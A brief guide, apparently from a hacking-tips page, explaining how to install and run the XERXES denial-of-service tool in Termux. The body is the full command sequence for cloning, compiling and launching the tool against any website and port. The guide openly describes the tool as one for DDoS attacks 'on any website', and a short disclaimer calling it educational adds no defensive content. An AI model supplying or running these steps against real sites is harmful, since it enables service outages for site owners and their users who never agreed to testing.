Guide For Install XERXES Tool In Termux
XERXES is tool for perform ddos attack on any website. With the help of this tool you can analysis ddos vulnerability on your websites.
Installation Commands
pkg up -y
pkg install git -y
pkg install clang -y
git clone https://github.com /XCHADXFAQ77X/XERXES
cd XERXES
chmod +x *
clang xerxes.c -o xerxes
./xerxes www.site.com 80
Here : www.site.com = site address
Here : 80 = Port Number
This tool is only for educational & vulnerability analysis purposes. Perform ddos without prior or mutual consent is illegal, we aren't responsible for any of your activity.